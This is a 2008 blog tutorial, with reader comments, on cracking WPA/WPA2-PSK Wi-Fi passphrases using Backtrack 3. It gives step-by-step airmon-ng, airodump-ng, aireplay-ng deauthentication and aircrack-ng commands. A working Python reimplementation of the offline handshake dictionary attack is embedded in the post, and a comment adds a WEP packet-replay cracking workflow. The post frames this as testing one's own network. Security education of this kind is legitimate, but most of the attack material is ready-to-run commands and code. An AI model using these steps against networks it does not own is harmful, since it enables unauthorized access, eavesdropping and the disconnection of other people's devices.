Saturday, December 27, 2008

Hacking WPA/WPA2 with Backtrack 3

WPA and WPA2 are security protocols designed to protect the wireless network of your home or office from intruders and eavesdroppers. They are substantially stronger than WEP, which can be broken outright in minutes regardless of the key chosen. WPA/WPA2 in pre-shared key (PSK) mode has no such shortcut: the practical attack is to capture the 4-way handshake between a client and the access point and then run an offline dictionary attack against the passphrase, which succeeds only if the passphrase is weak. This tutorial discusses the currently available technique for testing the security of your own wireless network. Be aware that breaking into your neighbor's network without permission is wrong.



What You Need


To test security of wireless networks, you can use the live CD Linux distribution called Backtrack. You can download its latest ISO image from Remote-Exploit.org and burn it with any CD burner program like InfraRecorder or CDBurnerXP. Alternatively, you can try the SliTaz Aircrack-NG distribution which is lighter and simpler than Backtrack.


Here's a list of what you need to crack WPA/WPA2:




Reboot your computer with a Backtrack CD and you'll be presented with the KDE environment.



Surveying Wireless Networks with Kismet


Launch Konsole, which is located right next to the KDE Start menu. Open /usr/local/etc/kismet.conf in a text editor and edit the source= line to include your wireless device. For example, for a Broadcom 43xx based card, put source=bcm43xx,eth1,bcm43xx (the three fields are the capture source type, the interface name, and a label of your choice). Refer to section 12 of the Kismet documentation for the source type matching your card. Save kismet.conf and start kismet.


Once Kismet starts detecting the wireless networks around you, press s and then P to sort the network list by packet count in descending order. Use the Up and Down keys to move to the target network and press i for network information or c for the client list. Only networks that Kismet reports as WPA or WPA2 with a pre-shared key are targets for the attack below. Write down the following:



  • ESSID (wireless network name)
  • BSSID (MAC address of access point)
  • channel of wireless network
  • MAC address of clients

Press x to close popup windows and Q to exit Kismet.

Brute-Force Dictionary Attack



This is the classic offline dictionary attack: capture one complete 4-way handshake between a client and the access point, then try passphrases from a wordlist until one reproduces the message integrity code (MIC) in the captured handshake. Once the handshake is on disk, nothing further has to be sent to the network.


airmon-ng stop wlan0

airmon-ng start wlan0

The commands above put your wireless device in monitor mode, the mode in which the card passes every 802.11 frame it hears to the software instead of only frames addressed to it. Replace wlan0 with your wireless device name, such as eth1. Type iwconfig to make sure the card reports Mode:Monitor before continuing. Some drivers (madwifi-ng, for example) create a separate monitor interface rather than switching the existing one; in that case use the interface name printed by airmon-ng in all of the following commands.


airodump-ng -w test wlan0

Skip the step above if you used Kismet as in the previous section. Here airodump-ng is used to survey the Wi-Fi networks while hopping across channels. Note the channel (CH column) and the ENC/AUTH columns: only networks showing WPA or WPA2 with PSK authentication are targets for this attack. Press Ctrl+C to stop airodump-ng and copy the BSSID (MAC address) of the target network.


airodump-ng -w logfile -c 3 --bssid A0:B1:C2:D3:E4:F5 wlan0

Sniff and log the target network (specified with the --bssid option) on its channel (-c option, which stops the card from hopping so that no handshake frame is missed) to the specified log file prefix (-w option; airodump-ng appends -01.cap and so on). Wait until "WPA handshake: <BSSID>" appears in the top right corner of the screen, which means the capture now contains enough of the 4-way handshake to attack. Then stop airodump-ng by pressing Ctrl+C.


Optionally, if you see a client connected to the target network but no handshake appears (the client associated before you started capturing), you can deauthenticate the client by running the following example command in a separate terminal:



aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0


where the -a option specifies the access point, the -c option specifies the client to deauthenticate, and -0 5 sends five deauthentication packets. Deauthentication frames are neither encrypted nor authenticated in WPA/WPA2 (before 802.11w), so the client accepts the forged frame, drops its association, and normally reconnects within seconds, renegotiating the 4-way handshake while airodump-ng is capturing. Otherwise, you will have to wait until a handshake message shows up in the airodump-ng output. The addresses shown are placeholders that differ from the BSSID in the airodump-ng line above; substitute the BSSID and client MAC address you recorded.

zcat /pentest/password/pico/cowpatty/final-wordlist.txt.gz > /tmp/wordlist.txt

aircrack-ng -a 2 -w /tmp/wordlist.txt logfile*.cap


Begin a dictionary attack using the saved log file(s) and the specified wordlist (-w option); -a 2 selects WPA/WPA2-PSK cracking. For every word in the dictionary, aircrack-ng derives the pairwise master key from the word and the ESSID (PBKDF2 with 4096 rounds of HMAC-SHA1), derives the session key from it together with the two MAC addresses and the two nonces found in the captured handshake, and checks whether the result reproduces the handshake's MIC. The 4096 rounds are what make each guess expensive, so it may take hours or several days, depending on the size of the dictionary and the speed of your CPU, to try every word. If the passphrase is not in the dictionary, or is made up of random characters, you are out of luck and just wasting your time; the dictionary attack won't be any good in that case. Likewise, if airodump-ng never showed the "WPA handshake" line, the capture does not contain a usable handshake and aircrack-ng will report that none was found.
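The derivation that aircrack-ng repeats for every word, as an added example that is not part of the original tutorial or of aircrack-ng itself. It first builds message 2 of a handshake under a known passphrase, standing in for the frame airodump-ng would write to the .cap file, then recovers the passphrase by recomputing PMK, PTK and MIC for each candidate. The SSID HomeNet, both nonces, the passphrase and the wordlist are constructed; the two MAC addresses reuse the placeholders from the commands above. The PMK step is checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE"). It also carries the check a practitioner applies to wordlists: entries outside 8 to 63 ASCII characters cannot be WPA-PSK passphrases and are skipped before the expensive PBKDF2.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# MACs, SSID, nonces, passphrase and wordlist below are all constructed for this
# example; nothing comes from a real capture.
MIC_OFFSET = 81      # bytes before the Key MIC field of an EAPOL-Key frame
MIC_LEN = 16
KEY_INFO_OFFSET = 5  # EAPOL header (4) + descriptor type (1)
NONCE_OFFSET = 17    # ... + key info (2) + key length (2) + replay counter (8)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    # These 4096 rounds are the cost of every dictionary guess and the reason
    # aircrack-ng manages only a few hundred to a few thousand keys per second.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes, nbytes: int = 48) -> bytes:
    # PRF-n(PMK, "Pairwise key expansion", min||max(MACs) || min||max(nonces)).
    # 48 bytes = CCMP's KCK|KEK|TK (TKIP needs 64); the KCK is the first 16.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:nbytes]


def eapol_key_mic(kck: bytes, frame: bytes) -> bytes:
    # MIC over the whole EAPOL-Key frame with its MIC field zeroed. Key Info
    # bits 0-2 pick the algorithm: 1 = HMAC-MD5 (WPA), 2 = HMAC-SHA1/16 (WPA2).
    version = struct.unpack(">H", frame[KEY_INFO_OFFSET:KEY_INFO_OFFSET + 2])[0] & 0x7
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError(f"unsupported key descriptor version {version}")


def build_eapol_msg2(kck: bytes, snonce: bytes, version: int = 2) -> bytes:
    # Message 2 of the 4-way handshake (client -> AP), the frame airodump-ng
    # saves: carries SNonce, the client's RSN IE (CCMP/PSK here) and the MIC.
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    key_info = version | 0x0008 | 0x0100                  # version | Pairwise | MIC
    body = struct.pack(">BHHQ", 0x02, key_info, 0, 1)     # RSN desc, key len, replay ctr
    body += snonce + b"\x00" * 32                         # nonce, IV(16), RSC(8), key ID(8)
    body += b"\x00" * MIC_LEN + struct.pack(">H", len(rsn_ie)) + rsn_ie
    frame = struct.pack(">BBH", 0x01, 0x03, len(body)) + body   # 802.1X v1, EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_key_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes,
                    eapol_msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    # Offline dictionary attack: redo the whole derivation per word, compare MICs.
    snonce = eapol_msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    target_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        # WPA-PSK passphrases are 8..63 ASCII chars; anything else can never
        # match, so skip it rather than pay for a useless PBKDF2.
        if not (8 <= len(candidate) <= 63 and candidate.isascii()):
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_key_mic(kck, eapol_msg2), target_mic):
            return candidate
    return None


# Constructed "capture": BSSID and client MAC reuse the placeholders from the
# tutorial's airodump-ng and aireplay-ng lines; nonces are fixed for repeatability.
AP_MAC = bytes.fromhex("a0b1c2d3e4f5")
STA_MAC = bytes.fromhex("000fb5fdfbc2")
SSID = "HomeNet"
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def simulate_capture(passphrase: str) -> bytes:
    # The client's side of the real handshake, MIC'd under the true PSK.
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(kck, SNONCE)


def demo(wordlist=("short", "12345678", "letmein1", "password", "qwertyuiop")):
    # Attacker knows only SSID, both MACs, ANonce (from msg 1) and the MIC'd msg 2.
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, simulate_capture("password"), wordlist)


if __name__ == "__main__":
    # IEEE 802.11i Annex test vector: passphrase "password", SSID "IEEE"
    print(pmk_from_passphrase("password", "IEEE").hex())
    print("recovered passphrase:", demo())
```

Run it directly to print the PMK test vector and the recovered passphrase. Every candidate costs one pbkdf2_hmac call with 4096 rounds; the PTK and MIC steps are two or three HMACs and are negligible by comparison, which is why precomputed PMK tables (keyed by SSID) and GPU PBKDF2 are the only ways to speed this attack up.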



Finding a Good Dictionary


You need a good dictionary to crack WPA-PSK: the attack can only recover a passphrase that is actually in the wordlist. Note that WPA passphrases are between 8 and 63 characters long, so shorter entries in lists meant for other password types can never match and are wasted. The Backtrack 3 CD has wordlist files at the following locations:


/usr/local/john-1.7.2/password.lst

/pentest/fuzzers/spike/src/password.lst

/pentest/fuzzers/spike/src/wordlist

/pentest/password/pico/cowpatty/final-wordlist.txt.gz

/pentest/wireless/aircrack-ng/test/password.lst

/pentest/wireless/eapmd5pass/sample-wordlist.txt

/opt/windows-binaries/wordlist.txt.gz

Also, the aircrack-ng FAQ page has an extensive list of places where you can download good wordlists. In addition, I found a good wordlist called 9-final-wordlist.zip here.



Further Readings


3 comments:

  1. Way too complicated, bro... there's a better way... just:

    *airmon-ng stop (device)
    *airmon-ng start (device)
    *airodump-ng (device)

    After that the client MACs show up... just pick the one sending the most data packets...

    *airodump-ng --channel (AP channel) --bssid (AP MAC) -w hasil (device)

    Then if you want to get packets even faster, use...

    *aireplay-ng --arpreplay -b (AP MAC) -h (client MAC) (device)

    That's all I do...

    As for the deauth, you don't need it either... the important thing is that you're already replaying...

    Now what we're waiting for is the WEP...

    Just go ahead... type in the terminal...

    *aircrack-ng hasil*.cap


    NB: besides that there are other good tools too... in Backtrack there's one called spoon wep... nicer to use... you only need the cursor... with aircrack-ng you have to type first...

    (thanks to ALLAH SWT)...

    If you want to see my blog, go ahead...

    (http://tutorial-windows-linux.blogspot.com/)

    (http://esemkha.blogspot.com/)

  2. Hi..

    Thanks for your wordlist. I have downloaded it and extracted it, but I do not know how to access the wordlist when I'm running Linux on VMware.

    I have searched the aircrack FAQ, but they provide links to wordlists and I have no idea how to use them on Linux.

    Greatly appreciate if you could help me..

    Thanks in advance..

  3. Try mounting the disk partition you saved your wordlist onto, then use it:

    In konsole, type something like:

    mount -t ntfs-3g -o ro /dev/sda1 /mnt

    Then, to use the wordlist with aircrack-ng:

    aircrack-ng -a 2 -w /mnt/path/to/wordlist.txt *.cap
